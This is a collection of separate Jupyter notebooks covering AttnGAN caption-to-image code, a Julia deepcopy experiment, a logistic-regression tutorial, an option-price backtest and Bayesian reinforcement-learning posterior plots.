        for sent in captions:
            for word in sent:
                word_counts[word] += 1
        with open('wordtoix.pickle', 'rb') as handle:
            wordtoix = pickle.load(handle)
        with open('ixtoword.pickle', 'rb') as handle:
            ixtoword = pickle.load(handle)
        train_captions_new = []
        for t in train_captions:
            rev = []
            for w in t:
                if w in wordtoix:
                    rev.append(wordtoix[w])
            # rev.append(0)  # do not need '<end>' token
            train_captions_new.append(rev)
        test_captions_new = []
        for t in test_captions:
            rev = []
            for w in t:
                if w in wordtoix:
                    rev.append(wordtoix[w])
            # rev.append(0)  # do not need '<end>' token
            test_captions_new.append(rev)
        return [train_captions_new, test_captions_new,
                ixtoword, wordtoix, len(ixtoword)]
    def load_text_data(self, data_dir, split):
        """Build (filenames, captions-as-indices, ixtoword, wordtoix, n_words).

        NOTE(review): train and test use the same image ids, and the returned
        data is always the 'train' side regardless of `split` — confirm.
        """
        filepath = os.path.join(data_dir, 'captions.pickle')
        captions = pd.read_excel('../captions.xlsx')
        captions.columns = [u'id', u'image_id', u'CAPTIONS', u'Unnamed: 3']
        captions.image_id = captions.image_id.apply(lambda x: x.replace('.jpg',''))
        train_names = captions.image_id
        test_names = captions.image_id
        train_captions = self.load_captions(data_dir, train_names)
        test_captions = self.load_captions(data_dir, test_names)
        train_captions, test_captions, ixtoword, wordtoix, n_words = \
            self.build_dictionary(train_captions, test_captions)
        # Cache the processed captions (protocol 2 keeps py2 compatibility).
        with open(filepath, 'wb') as f:
            pickle.dump([train_captions, test_captions,
                         ixtoword, wordtoix], f, protocol=2)
        print('Save to: ', filepath)
        # a list of list: each list contains
        # the indices of words in a sentence
        captions = train_captions
        filenames = train_names
        return filenames, captions, ixtoword, wordtoix, n_words
    def load_class_id(self, data_dir, total_num):
        """Load per-image class ids, or fall back to 0..total_num-1."""
        if os.path.isfile(data_dir + '/class_info.pickle'):
            with open(data_dir + '/class_info.pickle', 'rb') as f:
                class_id = pickle.load(f)
        else:
            class_id = np.arange(total_num)
        return class_id
    def get_caption(self, sent_ix):
        """Return (caption as a (WORDS_NUM, 1) int64 array, effective length).

        Short captions are zero-padded; long ones are subsampled to WORDS_NUM
        randomly chosen, order-preserving word positions.
        """
        # a list of indices for a sentence
        sent_caption = np.asarray(self.captions[sent_ix]).astype('int64')
        if (sent_caption == 0).sum() > 0:
            print('ERROR: do not need END (0) token', sent_caption)
        num_words = len(sent_caption)
        # pad with 0s (i.e., '<end>')
        x = np.zeros((cfg.TEXT.WORDS_NUM, 1), dtype='int64')
        x_len = num_words
        if num_words <= cfg.TEXT.WORDS_NUM:
            x[:num_words, 0] = sent_caption
        else:
            ix = list(np.arange(num_words))  # 1, 2, 3,..., maxNum
            np.random.shuffle(ix)
            ix = ix[:cfg.TEXT.WORDS_NUM]
            ix = np.sort(ix)
            x[:, 0] = sent_caption[ix]
            x_len = cfg.TEXT.WORDS_NUM
        return x, x_len
    def __getitem__(self, index):
        """Return (imgs, caption, caption length, class id, filename key)."""
        #
        key = self.filenames[index]
        cls_id = self.class_id[index]
        #
        if self.bbox is not None:
            bbox = self.bbox[key]
            data_dir = '%s/CUB_200_2011' % self.data_dir
        else:
            bbox = None
            data_dir = self.data_dir
        #
        img_name = '%s/images/%s.jpg' % (data_dir, key)
        imgs = get_imgs(img_name, self.imsize,
                        bbox, self.transform, normalize=self.norm)
        # random select a sentence; numpy randint's upper bound is exclusive,
        # so sent_ix lies in [0, embeddings_num).
        sent_ix = random.randint(0, self.embeddings_num)
        new_sent_ix = index * self.embeddings_num + sent_ix
        caps, cap_len = self.get_caption(new_sent_ix)
        return imgs, caps, cap_len, cls_id, key
    def __len__(self):
        return len(self.filenames)
def get_imgs(img_path, imsize, bbox=None,
             transform=None, normalize=None):
    """Load one RGB image and return the list of per-branch normalized copies
    (a single-element list when cfg.GAN.B_DCGAN).

    If a CUB bounding box is given, crop a square region around its center
    with half-size r = 0.75 * max(width, height) of the box.
    """
    img = Image.open(img_path).convert('RGB')
    width, height = img.size
    if bbox is not None:
        r = int(np.maximum(bbox[2], bbox[3]) * 0.75)
        center_x = int((2 * bbox[0] + bbox[2]) / 2)
        center_y = int((2 * bbox[1] + bbox[3]) / 2)
        # Clamp the crop window to the image bounds.
        y1 = np.maximum(0, center_y - r)
        y2 = np.minimum(height, center_y + r)
        x1 = np.maximum(0, center_x - r)
        x2 = np.minimum(width, center_x + r)
        img = img.crop([x1, y1, x2, y2])
    if transform is not None:
        img = transform(img)
    ret = []
    if cfg.GAN.B_DCGAN:
        ret = [normalize(img)]
    else:
        for i in range(cfg.TREE.BRANCH_NUM):
            # print(imsize[i])
            # All but the last branch are downscaled copies; the last keeps the
            # transformed size. (transforms.Scale is deprecated -> Resize.)
            if i < (cfg.TREE.BRANCH_NUM - 1):
                re_img = transforms.Scale(imsize[i])(img)
            else:
                re_img = img
            ret.append(normalize(re_img))
    return ret
# +
def build_super_images2(real_imgs, captions, cap_lens, ixtoword,
                        attn_maps, att_sze, vis_size=256, topK=5):
    """Compose a visualization grid of the topK most-attended words per image.

    For each image, each word's attention map is thresholded, upscaled,
    blended over the image, and the rows are ordered by descending attention
    confidence; caption text is drawn above each column.

    Returns (img_set, sentences) on success, or None when a row width
    mismatch is detected.
    """
    batch_size = real_imgs.size(0)
    max_word_num = np.max(cap_lens)
    # White canvas with one FONT_MAX-tall text row per image.
    text_convas = np.ones([batch_size * FONT_MAX,
                           max_word_num * (vis_size + 2), 3],
                          dtype=np.uint8)
    real_imgs = \
        nn.Upsample(size=(vis_size, vis_size), mode='bilinear')(real_imgs)
    # [-1, 1] --> [0, 255]
    # NOTE(review): in-place ops mutate the caller's tensor — confirm acceptable.
    real_imgs.add_(1).div_(2).mul_(255)
    real_imgs = real_imgs.data.numpy()
    # b x c x h x w --> b x h x w x c
    real_imgs = np.transpose(real_imgs, (0, 2, 3, 1))
    pad_sze = real_imgs.shape
    middle_pad = np.zeros([pad_sze[2], 2, 3])
    # batch x seq_len x 17 x 17 --> batch x 1 x 17 x 17
    img_set = []
    num = len(attn_maps)
    text_map, sentences = \
        drawCaption(text_convas, captions, ixtoword, vis_size, off1=0)
    text_map = np.asarray(text_map).astype(np.uint8)
    bUpdate = 1
    for i in range(num):
        attn = attn_maps[i].cpu().view(1, -1, att_sze, att_sze)
        #
        attn = attn.view(-1, 1, att_sze, att_sze)
        attn = attn.repeat(1, 3, 1, 1).data.numpy()
        # n x c x h x w --> n x h x w x c
        attn = np.transpose(attn, (0, 2, 3, 1))
        num_attn = cap_lens[i]
        thresh = 2./float(num_attn)
        #
        img = real_imgs[i]
        row = []
        row_merge = []
        row_txt = []
        row_beforeNorm = []
        conf_score = []
        for j in range(num_attn):
            one_map = attn[j]
            # Confidence = total attention mass above 2x the threshold.
            mask0 = one_map > (2. * thresh)
            conf_score.append(np.sum(one_map * mask0))
            mask = one_map > thresh
            one_map = one_map * mask
            if (vis_size // att_sze) > 1:
                one_map = \
                    skimage.transform.pyramid_expand(one_map, sigma=20,
                                                     upscale=vis_size // att_sze)
            # Min-max normalize each map to [0, 1].
            minV = one_map.min()
            maxV = one_map.max()
            one_map = (one_map - minV) / (maxV - minV)
            row_beforeNorm.append(one_map)
        sorted_indices = np.argsort(conf_score)[::-1]
        for j in range(num_attn):
            one_map = row_beforeNorm[j]
            one_map *= 255
            # Blend the attention map over the image via an alpha mask.
            PIL_im = Image.fromarray(np.uint8(img))
            PIL_att = Image.fromarray(np.uint8(one_map))
            merged = \
                Image.new('RGBA', (vis_size, vis_size), (0, 0, 0, 0))
            mask = Image.new('L', (vis_size, vis_size), (180))  # (210)
            merged.paste(PIL_im, (0, 0))
            merged.paste(PIL_att, (0, 0), mask)
            merged = np.array(merged)[:, :, :3]
            row.append(np.concatenate([one_map, middle_pad], 1))
            row_merge.append(np.concatenate([merged, middle_pad], 1))
            # The j-th word's text tile from the pre-drawn caption canvas.
            txt = text_map[i * FONT_MAX:(i + 1) * FONT_MAX,
                           j * (vis_size + 2):(j + 1) * (vis_size + 2), :]
            row_txt.append(txt)
        # reorder by descending confidence, keep only the topK words
        row_new = []
        row_merge_new = []
        txt_new = []
        for j in range(num_attn):
            idx = sorted_indices[j]
            row_new.append(row[idx])
            row_merge_new.append(row_merge[idx])
            txt_new.append(row_txt[idx])
        row = np.concatenate(row_new[:topK], 1)
        row_merge = np.concatenate(row_merge_new[:topK], 1)
        txt = np.concatenate(txt_new[:topK], 1)
        if txt.shape[1] != row.shape[1]:
            # BUGFIX: the original printed row_merge_new.shape, but
            # row_merge_new is a plain list (no .shape), so the warning line
            # itself raised AttributeError; report the concatenated array.
            print('Warnings: txt', txt.shape, 'row', row.shape,
                  'row_merge', row_merge.shape)
            bUpdate = 0
            break
        row = np.concatenate([txt, row_merge], 0)
        img_set.append(row)
    if bUpdate:
        img_set = np.concatenate(img_set, 0)
        img_set = img_set.astype(np.uint8)
        return img_set, sentences
    else:
        return None
def drawCaption(convas, captions, ixtoword, vis_size, off1=2, off2=2):
    """Render each caption's words as "index:word" text onto `convas`.

    Word index 0 is treated as the end-of-caption marker. Returns
    (PIL image with the text drawn, list of per-caption word lists).
    """
    num = captions.size(0)
    img_txt = Image.fromarray(convas)
    # get a font
    # fnt = None  # ImageFont.truetype('Pillow/Tests/fonts/FreeMono.ttf', 50)
    # fnt = ImageFont.truetype('Pillow/Tests/fonts/FreeMono.ttf', 50)
    # fnt = ImageFont.truetype("arial.ttf", 50)
    # get a drawing context
    d = ImageDraw.Draw(img_txt)
    sentence_list = []
    for i in range(num):
        cap = captions[i].data.cpu().numpy()
        sentence = []
        for j in range(len(cap)):
            if cap[j] == 0:
                break
            word = ixtoword[cap[j]].encode('ascii', 'ignore').decode('ascii')
            # Draw the first 6 chars of the word at its column slot; FONT_MAX
            # (from miscc.utils) is the per-caption row height.
            d.text(((j + off1) * (vis_size + off2), i * FONT_MAX), '%d:%s' % (j, word[:6]), fill=(255, 255, 255, 255))
            sentence.append(word)
        sentence_list.append(sentence)
    return img_txt, sentence_list
# -
def algo_gen_example(self, data_dic):
    """Generate and display images for the pre-encoded captions in data_dic.

    `self` is a trainer instance (only self.n_words is read). Checkpoint
    paths come from the notebook-level NET_G / NET_E globals; requires CUDA.
    """
    if NET_G == '':
        print('Error: the path for morels is not found!')
    else:
        # Build and load the generator
        text_encoder = \
            RNN_ENCODER(self.n_words, nhidden=cfg.TEXT.EMBEDDING_DIM)
        state_dict = \
            torch.load(NET_E, map_location=lambda storage, loc: storage)
        text_encoder.load_state_dict(state_dict)
        # NOTE(review): loads from the NET_E global but reports cfg.TRAIN.NET_E.
        print('Load text encoder from:', cfg.TRAIN.NET_E)
        text_encoder = text_encoder.cuda()
        text_encoder.eval()
        # the path to save generated images
        if cfg.GAN.B_DCGAN:
            netG = G_DCGAN()
        else:
            netG = G_NET()
        s_tmp = NET_G[:NET_G.rfind('.pth')]
        model_dir = NET_G
        state_dict = \
            torch.load(model_dir, map_location=lambda storage, loc: storage)
        netG.load_state_dict(state_dict)
        print('Load G from: ', model_dir)
        netG.cuda()
        netG.eval()
        for key in data_dic:
            captions, cap_lens, sorted_indices = data_dic[key]
            batch_size = captions.shape[0]
            nz = cfg.GAN.Z_DIM
            # volatile=True is the pre-0.4 PyTorch way of disabling autograd.
            captions = Variable(torch.from_numpy(captions), volatile=True)
            cap_lens = Variable(torch.from_numpy(cap_lens), volatile=True)
            captions = captions.cuda()
            cap_lens = cap_lens.cuda()
            for i in range(1):  # 16
                noise = Variable(torch.FloatTensor(batch_size, nz), volatile=True)
                noise = noise.cuda()
                #######################################################
                # (1) Extract text embeddings
                ######################################################
                hidden = text_encoder.init_hidden(batch_size)
                # words_embs: batch_size x nef x seq_len
                # sent_emb: batch_size x nef
                words_embs, sent_emb = text_encoder(captions, cap_lens, hidden)
                mask = (captions == 0)  # mask out padding positions
                #######################################################
                # (2) Generate fake images
                ######################################################
                noise.data.normal_(0, 1)
                fake_imgs, attention_maps, _, _ = netG(noise, sent_emb, words_embs, mask)
                # G attention
                cap_lens_np = cap_lens.cpu().data.numpy()
                for j in range(batch_size):
                    for k in range(len(fake_imgs)):
                        im = fake_imgs[k][j].data.cpu().numpy()
                        # [-1, 1] -> [0, 255]
                        im = (im + 1.0) * 127.5
                        im = im.astype(np.uint8)
                        # print('im', im.shape)
                        im = np.transpose(im, (1, 2, 0))
                        # print('im', im.shape)
                        im = Image.fromarray(im)
                        plt.imshow(im)
def gen_example(wordtoix, algo, sent):
    '''generate images from example sentences'''
    from nltk.tokenize import RegexpTokenizer
    # Tokenize the sentence and keep only ASCII-representable tokens that
    # exist in the vocabulary, mapped to their word indices.
    word_ids = []
    for tok in RegexpTokenizer(r'\w+').tokenize(sent.lower()):
        tok = tok.encode('ascii', 'ignore').decode('ascii')
        if len(tok) > 0 and tok in wordtoix:
            word_ids.append(wordtoix[tok])
    # Single-caption "batch": lengths sorted in descending order, as the
    # RNN text encoder expects.
    all_caps = [word_ids]
    lengths = [len(word_ids)]
    longest = np.max(lengths)
    order = np.argsort(lengths)[::-1]
    lengths = np.asarray(lengths)[order]
    # Zero-pad every caption to the longest length.
    padded = np.zeros((len(all_caps), longest), dtype='int64')
    for dst_row, src_row in enumerate(order):
        cap = all_caps[src_row]
        padded[dst_row, :len(cap)] = cap
    algo_gen_example(algo, {'out': [padded, lengths, order]})
# # RUN
cfg.TRAIN.MAX_EPOCH = 30
dataset = TextDataset(cfg.DATA_DIR, split_dir,
                      base_size=cfg.TREE.BASE_SIZE,
                      transform=image_transform)
dataloader = torch.utils.data.DataLoader(
    dataset, batch_size=cfg.TRAIN.BATCH_SIZE,
    drop_last=True, shuffle=bshuffle, num_workers=int(cfg.WORKERS))
algo = trainer(output_dir, dataloader, dataset.n_words, dataset.ixtoword)
algo.train()
# Checkpoint paths read as module-level globals by algo_gen_example above.
NET_E = '../coco/text_encoder100.pth'
NET_G = '../coco/coco_AttnGAN2.pth'
# Generate an image from caption row 224 and show the real image next to it.
i =224
gen_example(dataset.wordtoix, algo, captions.CAPTIONS[i])
captions.CAPTIONS[i], plt.imshow(Image.open('../coco/images/'+captions.image_id[i]+'.jpg'))
|
code/Exp_new.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 1.6.3
# language: julia
# name: julia-1.6
# ---
# Parametric immutable struct; experiment with how deepcopy treats it.
struct Foo{A, B} a::A; b::B end
foo = Foo(1, 2)
foo1 = deepcopy(foo)
@which deepcopy(foo)  # show which deepcopy method is dispatched
# Struct with an inner constructor: b is fixed to 2a, converted to a's type.
struct Bar{T}
    a::T
    b::T
    Bar(a) = new{typeof(a)}(a, oftype(a, 2)a)
end
bar = Bar(1)
bar1 = deepcopy(bar)
# Low-level runtime calls: allocate an uninitialized Bar, then set its 2nd
# field (0-based index 1) to 3, bypassing the inner constructor.
y = ccall(:jl_new_struct_uninit, Any, (Any,), typeof(bar))
ccall(:jl_set_nth_field, Cvoid, (Any, Csize_t, Any), y, 2-1, 3)
|
0022/deepcopty.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Supervised Learning
# # Logistic Regression:
# +
# Logistic Regression:
# Linear Regression v/s Logistic Regression:
# 1. Solves regression problems          1. Solves classification problems
# 2. Works with continuous variables     2. Works with categorical variables
# 3. Straight line (best-fit line)       3. Sigmoid curve
# Linear Regression  -> quantitative (continuous) target
# Logistic Regression -> qualitative (categorical) target
# -
# Nominal: Data with no inherent order or ranking
#
#
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# # Predict whether the person buys the insurance or not:
# ## ML and DL:
#
# ML : low dimensional data
#
# DL: High dimensional data - huge amount of data
# ### Our goal is to first set the "bought_insurance" as : below age of 30: No (0), above 30: Yes (1):
#
# except 1 : age 25 -> bought_insurance = 1
# Toy dataset: 20 people with age and a 0/1 purchase label.
df = pd.DataFrame({"age":[28,29,34,35,14,16,52,53,62,34,35,23,43,47,50,25,54,23,29,20],"bought_insurance":[0,0,1,1,0,0,1,1,1,1,1,0,1,1,1,1,1,0,0,0]})
df
plt.scatter(df["age"],df["bought_insurance"], marker = "+", color = "red")
# ### 1.0: Those who bought the insurance
# ### 0.0: Those who did not buy the insurance
# # Goal: Train 80% of the dataset and Test on the other 20%
# ## Split the dataset into Training set and Testing set
from sklearn.model_selection import train_test_split
# X-Axis: x_train, x_test
#
# Y-Axis: y_train, y_test
# ### test_size = 0.2 or 20%
x_train,x_test,y_train,y_test = train_test_split(df[["age"]],df.bought_insurance, test_size = 0.2)
# ### split in random format
print(len(x_train))
x_train
print(len(x_test))
x_test
y_train
y_test
# ## Notice how the dataset is split randomly:
# A second call without a fixed seed yields a different split.
x_train,x_test,y_train,y_test = train_test_split(df[["age"]],df.bought_insurance, test_size = 0.2)
x_train
x_test
y_train
y_test
# ## Fix the randomness of the split :
df
# random_state pins the shuffling, making the split reproducible.
x_train,x_test,y_train,y_test = train_test_split(df[["age"]],df.bought_insurance, test_size = 0.2, random_state = 10)
x_train
x_test
y_train
y_test
from sklearn.linear_model import LogisticRegression
model = LogisticRegression()
# Fit on the 80% training split.
model.fit(x_train,y_train)
# ### Now make predictions:
# ### age = 52
model.predict([[52]])
# ### age = 25
model.predict([[25]])
# Probe ages around the decision boundary.
model.predict([[26]])
model.predict([[24]])
model.predict([[22]])
model.predict([[23]])
model.predict([[27]])
# ### age = 19
model.predict([[19]])
# # Likelihood of x_test:
# Per-class probabilities for each test sample.
model.predict_proba(x_test)
model.score(x_test,y_test) #Here it is almost 100
# # Based on our dataset, the conclusion is that a person is likely to buy the insurance is he/she is above 25 , somewhat closer to our value of above 30
# # Pandas : range for freq = business days
rng = pd.date_range(start = "07-01-2019", end = "07-30-2019", freq = "B")
rng
rng_date = pd.date_range(start = "07-01-2019", end = "07-30-2019", freq = "D")
rng_date
# Calendar days that are not business days (i.e., the weekends).
rng_date.difference(rng)
|
Data-Science-HYD-2k19/Day-based/Day 48.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.8.5 32-bit
# name: python_defaultSpec_1598286770093
# ---
import pandas as pd
# Option-chain tick data; Date and Time columns are merged into one Date_Time column.
data = pd.read_excel("NIFTY25JUN2010000PE.xlsx", parse_dates=[['Date', 'Time']])
#convert df index to DataTimeIndex
data.index = pd.to_datetime(data['Date_Time'] )
data.isnull().sum()
data.head()
#downsample and aggregate: mean of each 15-minute window
Resampled_Data = data.resample('15T').mean()
Resampled_Data.head(40)
# ### Resampling Successful!!
# Getting NaN values for the rows missing in default sheet.
#
# Cleaning NaN Rows
CnR_Data = Resampled_Data.dropna(axis = 0)
# Exporting Cleaned and Resampled Sheet
CnR_Data.to_excel("Cleaned_and_Resampled_Data.xlsx")
# ## Getting data date by date
df = CnR_Data
df.shape
df.head(10)
df.columns
# + tags=[]
# Retrieved all the dates used in the dataframe
dates = sorted(list(set(df.index.date)))
# -
def calc(op, high, low, close):
    """Simulate one day's rule: enter a short on the first bar whose low
    undercuts the previous bar's low, exit on the first later bar whose high
    exceeds the entry bar's high; otherwise hold to the last bar.

    Returns close-at-exit minus the day's opening price.
    NOTE(review): for a short position the sign convention (close - open)
    looks inverted relative to short-trade P&L — confirm intended.
    """
    n = len(op)
    entry = -1
    # Find the first bar whose low breaks below the preceding bar's low.
    for i in range(1, n):
        if low[i] < low[i - 1]:
            entry = i
            break
    if entry != -1:
        # Exit on the first bar (from the entry bar onward) whose high
        # exceeds the entry bar's high.
        for j in range(entry, n):
            if high[j] > high[entry]:
                return close[j] - op[0]
    # No entry, or no exit trigger before the session ends.
    return close[-1] - op[0]
# + tags=[]
# Run the strategy day by day and print each day's profit or loss.
for date in dates[0:]:
    data = df.loc[str(date)]
    # Size of data
    # Columns 0..3 are assumed to be open/high/low/close — TODO confirm
    # against df.columns above.
    op, high, low, close = [], [], [], []
    #print(data.shape)
    for i in range(data.shape[0]):
        op.append((data.iloc[i])[0])
        high.append((data.iloc[i])[1])
        low.append((data.iloc[i])[2])
        close.append((data.iloc[i])[3])
    pNl = calc(op, high, low, close)
    if pNl<0:
        print(f"{date}: Loss \t{-round(pNl,2)}")
    elif pNl>0:
        print(f"{date}: Profit \t{round(pNl,2)}")
    else:
        print(f"{date}: No Profit or Loss")
    print("________________________________")
# -
|
Screener.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import sys
sys.path.append('/'.join(os.getcwd().split('/')[:-1]))
from Agents import QLearningAgent, BayesianQAgent, PSRLAgent, MomentMatchingAgent, UbeNoUnrollAgent
from Environments import DeepSea, WideNarrow, PriorMDP
from utils import solve_tabular_continuing_PI, run_experiment, run_oracle_experiment, load_agent
from tqdm import tqdm_notebook as tqdm
# For saving figures and agents
# Create the results directory tree on first run (idempotent).
if not os.path.exists('results'): os.mkdir('results')
if not os.path.exists('results/figures'): os.mkdir('results/figures')
if not os.path.exists('results/agent_logs'): os.mkdir('results/agent_logs')
fig_loc = 'results/figures/'
# Global matplotlib styling for all figures below.
# NOTE(review): `plt` (and `np`, used later) are not imported in any visible
# cell -- presumably an earlier import cell provides them; confirm.
plt.rc('xtick', labelsize=16)
plt.rc('ytick', labelsize=16)
plt.rc('legend', fontsize=16)
plt.rc('figure', titlesize=50)
# -
# # Environment constants
# +
# PriorMDP constants
# Total environment steps per run; agent state is logged every `save_every`.
num_time_steps = 5000
save_every = num_time_steps // 100
# Time step whose logged posterior is visualised in the cells below.
plot_time = 5000
Ns = 4  # number of states
Na = 2  # number of actions
# Hyperparameters passed to PriorMDP (presumably the prior from which the
# random MDP's dynamics/rewards are drawn -- confirm in the Environments code).
env_params = {'Ns' : Ns,
              'Na' : Na,
              'kappa' : 1.0,
              'mu0' : 0.0,
              'lamda' : 1.0,
              'alpha' : 4.0,
              'beta' : 4.0,
              'seed' : 1}
# Define environment
environment = PriorMDP(env_params)
# Number of PI steps and maximum buffer length (PSRL, UBE and MM only)
max_iter = 6 * Ns
max_buffer_length = Ns + 1
# -
# # Bayesian Q-Learning
# Agent parameters
# Prior hyperparameters for the Bayesian Q-learner; `sa_list` enumerates the
# environment's valid (state, action) pairs.
agent_params = {'gamma' : 0.9,
                'mu0' : 0.0,
                'lamda' : 4.0,
                'alpha' : 3.0,
                'beta' : 3.0,
                'num_mixture_samples' : 1000,
                'sa_list' : environment.sa_list()}
# +
# (Training loop kept for reference -- results are loaded from disk below.)
# for seed in tqdm(range(10)):
#     # Define agent
#     agent = BayesianQAgent(agent_params)
#     # Run experiment
#     run_experiment(environment=environment,
#                    agent=agent,
#                    seed=seed,
#                    num_time_steps=num_time_steps,
#                    max_buffer_length=1,
#                    save_every=save_every)
# +
# Optimal Q of the mean MDP, used as the ground-truth marker in the plots.
P, R = environment.get_mean_P_and_R()
pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, BayesianQAgent(agent_params), seed=0)
samples = []
leg_names = ['Sample mean',
             'True $Q^*_{\\mathbf{s}, \\mathbf{a}}$']
leg = [None] * 2
# Index of the logged posterior corresponding to t = plot_time.
T = plot_time // save_every
agent.Qpost = agent.Qpost_log[T]
# Draw 500 Q-samples per state (reduce_max=False returns per-action samples).
for s in range(Ns):
    samples.append([])
    for i in range(500):
        environment.s = s
        samples[-1].append(agent.take_action(s, 0, reduce_max=False)[0])
# Axes reordered so samples[:, s, a] indexes (sample, state, action).
samples = np.array(samples).swapaxes(0, 1)
optimal_actions = np.argmax(Q, axis=-1)
# One panel per state: sampled (Q[s,0], Q[s,1]) pairs, their mean, and truth.
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
    plt.subplot(1, Ns, s + 1)
    plt.scatter(samples[:, s, 0], samples[:, s, 1], color='purple', marker='x', s=12)
    leg[0] = plt.scatter(samples[:, s, 0].mean(),
                         samples[:, s, 1].mean(),
                         color='red',
                         marker='x',
                         s=500,
                         linewidth=3)
    leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
    plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
    plt.xlim([0, 6])
    plt.ylim([0, 6])
    xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
    ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
    # Tag the axis of the action that is optimal under the mean MDP.
    if optimal_actions[s] == 0:
        xlabel += ' (opt.)'
    else:
        ylabel += ' (opt.)'
    plt.xlabel(xlabel, fontsize=24)
    plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'BQL samples PriorMDP ($t$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
# Figure file name encodes the prior hyperparameters (dots -> underscores).
mu0, lamda, alpha, beta = agent.mu0, agent.lamda, agent.alpha, agent.beta
save_name = 'bql-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
# # PSRL
# Agent parameters
agent_params = {'gamma' : 0.9,
                'kappa' : 1.0,
                'mu0' : 0.0,
                'lamda' : 4.0,
                'alpha' : 3.0,
                'beta' : 3.0,
                'max_iter' : max_iter,
                'sa_list' : environment.sa_list()}
# +
# (Training loop kept for reference -- results are loaded from disk below.)
# for seed in tqdm(range(10)):
#     # Define agent
#     agent = PSRLAgent(agent_params)
#     # Run experiment
#     run_experiment(environment=environment,
#                    agent=agent,
#                    seed=seed,
#                    num_time_steps=num_time_steps,
#                    max_buffer_length=max_buffer_length,
#                    save_every=save_every)
# +
# Optimal Q of the mean MDP, used as the ground-truth marker in the plots.
P, R = environment.get_mean_P_and_R()
pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, PSRLAgent(agent_params), seed=0)
samples = []
T = plot_time // save_every
# Restore the dynamics/reward posterior logged at t = plot_time.
agent.Ppost = agent.Ppost_log[T]
agent.Rpost = agent.Rpost_log[T]
# Each sample: draw (P, R) from the posterior and solve for its optimal Q.
for i in range(500):
    # NOTE(review): `s` here is leftover from the previous cell's loop, and
    # nothing below reads environment.s -- looks like copy-paste residue;
    # confirm this line can be removed.
    environment.s = s
    P, R = agent.sample_posterior()
    Q_ = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)[1]
    samples.append(Q_)
samples = np.array(samples)
optimal_actions = np.argmax(Q, axis=-1)
# NOTE(review): `leg`/`leg_names` are reused from the BQL cell above.
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
    plt.subplot(1, Ns, s + 1)
    plt.scatter(samples[:, s, 0], samples[:, s, 1], color='orange', marker='x', s=12)
    leg[0] = plt.scatter(samples[:, s, 0].mean(),
                         samples[:, s, 1].mean(),
                         color='red',
                         marker='x',
                         s=500,
                         linewidth=3)
    leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
    plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
    plt.xlim([0, 6])
    plt.ylim([0, 6])
    xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
    ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
    # Tag the axis of the action that is optimal under the mean MDP.
    if optimal_actions[s] == 0:
        xlabel += ' (opt.)'
    else:
        ylabel += ' (opt.)'
    plt.xlabel(xlabel, fontsize=24)
    plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'PSRL samples PriorMDP ($t$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
# Figure file name encodes the prior hyperparameters (dots -> underscores).
mu0, lamda, alpha, beta = agent.mu0, agent.lamda, agent.alpha, agent.beta
save_name = 'psrl-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
# # UBE
# Agent parameters
# `Rmax` is the maximum mean reward (presumably used to bound value
# uncertainty -- confirm in the agent code); `zeta` scales exploration noise.
agent_params = {'gamma' : 0.9,
                'kappa' : 1.0,
                'mu0' : 0.0,
                'lamda' : 4.0,
                'alpha' : 3.0,
                'beta' : 3.0,
                'Rmax' : environment.get_mean_P_and_R()[1].max(),
                'max_iter' : max_iter,
                'zeta' : 1.0,
                'num_dyn_samples' : 100,
                'sa_list' : environment.sa_list()}
# +
# (Training loop kept for reference -- results are loaded from disk below.)
# for seed in tqdm(range(10)):
#     # Define agent
#     agent = UbeNoUnrollAgent(agent_params)
#     # Run experiment
#     run_experiment(environment=environment,
#                    agent=agent,
#                    seed=seed,
#                    num_time_steps=num_time_steps,
#                    max_buffer_length=max_buffer_length,
#                    save_every=save_every)
# +
# Optimal Q of the mean MDP, used as the ground-truth marker in the plots.
P, R = environment.get_mean_P_and_R()
